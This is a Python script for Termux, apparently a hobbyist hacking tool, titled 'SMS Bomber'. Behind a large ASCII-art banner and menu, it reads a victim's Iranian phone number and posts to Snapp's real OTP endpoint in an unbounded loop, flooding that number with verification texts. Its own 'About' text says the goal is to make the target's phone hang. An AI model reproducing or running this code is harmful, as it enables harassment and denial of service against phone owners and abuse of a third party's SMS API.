import requests
import os
red='\033[31m'
green='\033[32m'
blue='\033[36m'
pink='\033[35m'
rang='\033[34m'
link = "https://app.snapp.taxi/api/api-passenger-oauth/v2/otp"
os.system("for i in {1..12}; do for j in $(seq 1 $i); do echo -ne $iÃ—$j=$((i*j))\\t;done; echo;done")
os.system("clear")
print(f"{red} ")
print("            NNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("       NNNNNNNNDNNDI??+=~~~~=+?INNNNNNNNNNN ")
print("     NNNND8~.. . ......  ......... ...+NNNNNN ")
print("    NNN+. ................ ......... ... .,DNN ")  
print("   NNN......................................=NN ")
print("  NN.. .......................................DN ")
print(" NN.. ..NNNNNNNND. ............. MNNNNNNN? ....NN ")
print(" ND.. DN=....+NNNNN+ .........DNNNNN~....NN....DN ")
print("NN .D ....~DNN,NNNNN...... .NND~DND8=..... N..,NNN ")
print("NN, ...........?NNNNN?.....NDNNNDNI.............NN ")
print("NN............. .8NN:........,,D$. .............DN ")
print("NN.................NN .. ....NN.................NN ")
print("NN... .  INNNND....,NN......D:.. .~NNNNN$.......NN ")
print("NN.....NNNNNNNNNN8 .NNO.........DNNNNNNNNND.....NN ")
print("NN..NNNNNNNNNNNNNNN.NNN.......ONNNNNNNNNNNNND...NNN ")
print("NN..................NNN.........................NNNN ")
print("NNN................NNNN....... ................NNNNNN ")
print("NNN.DNN.... + ..?DNNNNN....NN.....+.........8NNNNNNNNN ")
print("NNND.NDNNNP8...NND..NN?......Z.....8DNNDDNNN..NNNNNNNNN ")
print("NNNN....DN......ON..NN................ ?NN....NNNNNNNNNN ")
print("NNNNN.,..NN,.......=NN ...............NNN....DNNNNNNNNNNN ")
print("NNNNN....:NNDZ .... .........n.......NNN.....NNNNNNNNNNNNN ")
print("NNNNNN.....DNNNND....lNNNNNNI.....DNNNN.... NNNNNNNNNNNNNNN ")
print("NNNNNNN......DNNNNNNNNNI..NNNNNNNNNND+... .DNNNNNNNNNNNNNNNN ")
print("NNNNNNNN .......?NNDNN.....NNNNNNNZ.......NNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNN ....... ..=========.... .......NNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNN..............................NNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNN...........NDNNN.,..........MNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNN .........$NNNN...........NNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNNN.........NNNN8..........NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNNNNN.......NNNNN........NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNNNNBNNN.....NNN..... NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNNNNNNNNNNN...N....NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print("NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN ")
print(f"{green} ")
print("            ┌──────────⊙─────────┐")
print("            │by- $ MMD Xayrøux $ │")
print("            └──────────⊙─────────┘")
print(f"{pink} ")
print("♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═■")
print(f"{red} ")
print("   SMS Bomber  ")
print(f"{green} ") 
print("Github :  @Xayroux ")
print(f"{pink} ")
print("♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═♢═■")
print(f"{green} ")
print("|1|SMSBomber")
print("|2|Star wars")
print("|3|About")
print("|4|Exit")
print(f"{rang} ")
Elite = int(input("● choose ●>: "))
if Elite == 1:
    os.system("pkg install figlet")
    os.system("clear")
    os.system("figlet SMSbomber ")
    number = input("Enter the phone number {9×××××××××} : ")
    while True:
              requests.post(link,data={"cellphone":"+98"+number})
              print("sms sended", number)
elif Elite == 4:
    os.system("pkg install figlet")
    os.system("clear")
    os.system("figlet XAYROUX ")
elif Elite == 3:
    os.system("pkg install figlet")
    os.system("clear")
    os.system("figlet SMSbomber ")
    print(f"{red}")
    print("         ┌───────────────────────────────────────────┐ ")
    print("         │                                           │ ")
    print("         │         ___    __                __       │ ")
    print("         │        /   |  / /_  ____  __  __/ /_      │ ")
    print("         │       / /| | / __ \/ __ \/ / / / __/      │ ")
    print("         │      / ___ |/ /_/ / /_/ / /_/ / /_        │ ")
    print("         │     /_/  |_/_.___/\____/\__,_/\__/        │ ")
    print("         │                                           │ ")
    print("         │───────────────────────────────────────────│ ")
    print("         │                                           │ ")
    print("         │>> 'SMS Bomber is a program that sends     │ ")
    print("         │    a large number of text messages to the │ ")
    print("         │    phone number and causes the phone to   │ ")
    print("         │    hang up.                               │ ")
    print("         │    Termux is a Linux terminal             │ ")
    print("         │                                           │ ")
    print("         │>>  Author :  MMD Xayrøux                  │ ")
    print("         │    Github :  https://github.com/Xayroux   │ ")
    print("         │     Blog  :  http://xayrouxhack.blogfa.com│ ")
    print("         │                                           │ ")
    print("         └───────────────────────────────────────────┘ ")
elif Elite == 2:
    os.system("telnet towel.blinkenlights.nl")
